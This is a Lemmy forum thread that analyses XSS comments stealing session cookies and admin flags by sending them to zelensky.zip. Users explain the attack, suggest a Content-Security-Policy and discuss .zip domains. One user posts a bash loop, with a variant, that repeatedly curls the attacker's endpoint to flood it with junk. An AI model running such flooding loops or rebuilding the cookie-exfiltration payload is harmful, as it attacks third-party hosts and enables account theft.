Are they just an issue with wefwef or trying to use an exploit

  • nothendev@sopuli.xyz
    link
    fedilink
    arrow-up
    12
    ·
    1 year ago

    if it has document.cookie in it - it is trying to steal your cookies, to use your account. that’s a JavaScript link that, well, sends your account cookies to a random ass site.

  • Tartas1995@discuss.tchncs.de
    link
    fedilink
    arrow-up
    10
    ·
    edit-2
    1 year ago

    Hey, I can tell you want it does. While I don’t know if they try to download something too (while it really doesn’t look like it), they are trying to steal your browser cookies.

    I haven’t removed the obfuscation yet as I am literally in bed but I can tell the general idea of the code.

    Onload is a html attribute. Html attribute tell your browser more about what the browser should be doing. So basically onload is an instruction to your browser. By posting those comments, they try to run something called cross site scripting. Basically they want to run their code in your browser without them being the website owner. So now we know the intend of the post, let’s look into the details.

    Onload is an attribute that tells the browser to do something once it is fully loaded.

    Fetch is a function that allows your browser to request additional information from the server. Endless scrolling would be done with that.

    String.fromcharcode is just there to hide a little bit. Think of it as a fancy way to say a word. they are saying a website to connect to there.

    Then document.cookie are your cookies for that website.

    The next thing is probably your username or something.

    So what does that mean? They try to make your browser execute their code when the website is onloaded. The code sends your cookies and your username(?) To a server. They probably save the username and cookie and try to steal the account later.

    You seeing the code is good evidence that your browser hasn’t execute the code as the browser didn’t understand it as code to be executed but code to display. So you are probably safe and don’t need to worry

    Edit: ups sorry for not answering the question. I don’t know which client they are targeting. They might or might not be targeting wefwef. But they target you, the user, too. And it is probably for Webbrowser users, so chances are wefwef or other web clients.

    Edit edit: some people pointed out that it is not the username but basically the admin status of the account.

    • 𝙚𝙧𝙧𝙚@feddit.win
      link
      fedilink
      arrow-up
      6
      ·
      edit-2
      1 year ago

      Looks like it’s issuing a GET to https://zelensky.zip/save/{ENCODED_JWT_TOKEN_AND_NAV_FLAG}. The ENCODED_JWT_TOKEN is from btoa(document.cookie+nav_flag) where nav_flag is essentially 'navAdmin' if the account hit is an admin or '' if the user hit is not an admin (it checks if the admin button in the nav exists). Their server is likely logging all incoming requests and they just need to do a quick decoding to get jwt tokens and a flag telling them if it’s an admin account.

      I’d be hesitant to visit Lemmy on a browser atm 😓

          • 𝘋𝘪𝘳𝘬@lemmy.ml
            link
            fedilink
            arrow-up
            1
            ·
            1 year ago

            To prevent execution of scripts not referenced with the correct nonce:

            script-src 'self' 'nonce-$RANDOM'
            

            To make it super strict, this set could be used:

            default-src 'self';
            script-src 'nonce-$RANDOM'
            object-src 'none';
            base-uri 'none';
            form-action 'none';
            frame-ancestors 'none';
            frame-src 'none';
            require-trusted-types-for 'script'
            

            Especially the last one might cause the most work, because the “modern web development environment” simply cannot provide this. Also: form-action 'none'; should be validated. It should be set to self if forms are actually used to send data to the server and not handled by Javascript.

            The MDN has a good overview: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy

    • Ech@lemm.ee
      link
      fedilink
      arrow-up
      5
      ·
      edit-2
      1 year ago

      Instances running 18.2 should be fine, and as far as I understand it (with no dev qualifications to speak of, fwiw), these exploits only affected the local instance - they weren’t permeating through other instances viewing the exploits through Activitypub. That’s all to say, as long as your instance is running 18.2 or higher (the 18.2-rc’s should have in progress patches, as well), I believe you should be fine.

      • aloeha@lemmy.world
        link
        fedilink
        arrow-up
        1
        ·
        1 year ago

        Shit, it doesn’t look like lemmy.world (my home instance) is running 18.2 yet, according to the bottom of the window. Is that correct?

  • malloc@programming.dev
    link
    fedilink
    English
    arrow-up
    5
    ·
    1 year ago

    Lemmy.world instance under attack right now. It was previously redirecting to 🍋 🎉 and the title and side bar changed to antisemitic trash.

    They supposedly attributed it to a hacked admin account and was corrected. But the instance is still showing as defaced and now the page just shows it was “seized by reddit”.

    Seems like there is much more going on right now and the attackers have much more than a single admin account.

    • malloc@programming.dev
      link
      fedilink
      English
      arrow-up
      3
      ·
      1 year ago

      I just want to add a quick note:

      From OPs screenshot, I noticed the JS code is attempting to extract the session cookie from the users that click on the link. If it’s successful, it attempts to exfiltrate to some server otherwise sends an empty value.

      You can see the attacker/spammer obscures the url of the server using JS api as well.

      May be how lemmy.world attackers have had access for a lengthy period of time. Attackers have been hijacking sessions of admins. The one compromised user opened up the flood gates.

      Not a sec engineer, so maybe someone else can chime in.

      • Gellis12@lemmy.ca
        link
        fedilink
        arrow-up
        3
        ·
        1 year ago

        Here’s a quick bash script if anyone wants to help flood the attackers with garbage data to hopefully slow them down: while true; do curl https://zelensky.zip/save/$(echo $(hostname) $(date) | shasum | sed 's/.\{3\}$//' | base64); sleep 1; done

        Once every second, it grabs your computer name and the current system time, hashes them together to get a completely random string, trims off the shasum control characters and base64 encodes it to make everything look similar to what the attackers would be expecting, and sends it as a request to the same endpoint that their xss attack uses. It’ll run on Linux and macOS (and windows if you have a WSL vm set up!) and uses next to nothing in terms of system resources.

        • gandalftheBlack@lemmy.ml
          link
          fedilink
          arrow-up
          3
          ·
          edit-2
          1 year ago

          Here’s the one where it uses epoch time (better randomization) and also hides the output of curl

          while true; do curl https://zelensky.zip/save/$(echo $(hostname) $(date +%s) | shasum | sed 's/.\{3\}$//' | base64) &> /dev/null ; echo "done."; done
          
          
    • loutr@sh.itjust.works
      link
      fedilink
      English
      arrow-up
      5
      ·
      1 year ago

      Yes, these comments are JavaScript code, intended to run in the browser of anyone viewing them. Best to stay clear of the webapp for now (native mobile apps should not be vulnerable).

  • tarjeezy@lemmy.ca
    link
    fedilink
    English
    arrow-up
    1
    ·
    1 year ago

    The encoded string contains the URL zelensky dot zip. Zip is one of the newer top-level domains. It itself is not a zip file, but I am not going to visit that site to find out whatever treasures it has to offer…

        • Snipe_AT@lemmy.atay.dev
          link
          fedilink
          arrow-up
          0
          arrow-down
          16
          ·
          1 year ago

          sorry i’m missing it. why this specific TLD? can’t they just use any TLD for this and achieve the same thing? is there something special with .mov?

      • Snipe_AT@lemmy.atay.dev
        link
        fedilink
        arrow-up
        0
        arrow-down
        18
        ·
        edit-2
        1 year ago

        sorry i’m missing it. why this specific TLD? can’t they just use any TLD for this and achieve the same thing? why is this a reason to block it?

          • Snipe_AT@lemmy.atay.dev
            link
            fedilink
            arrow-up
            0
            arrow-down
            18
            ·
            1 year ago

            i think i understand that part but why is this specific event “another reason to block this TLD”? can’t they just use any TLD for this and achieve the same thing? is there another inherit security issue with .zip that doesn’t exist with other domains?

              • Snipe_AT@lemmy.atay.dev
                link
                fedilink
                arrow-up
                0
                arrow-down
                19
                ·
                1 year ago

                gotcha ok i think i’m getting it. just to make sure i’m not missing anything, you’re saying that in this case it didn’t matter as in the end they could use any TLD and achieve the same effect.

                but in general, threat actors hope to confuse people into thinking this “.zip” TLDs are only referencing local files instead of web addresses. right?

                • 𝘋𝘪𝘳𝘬@lemmy.ml
                  link
                  fedilink
                  arrow-up
                  2
                  ·
                  1 year ago

                  but in general, threat actors hope to confuse people into thinking this “.zip” TLDs are only referencing local files instead of web addresses. right?

                  Exactly!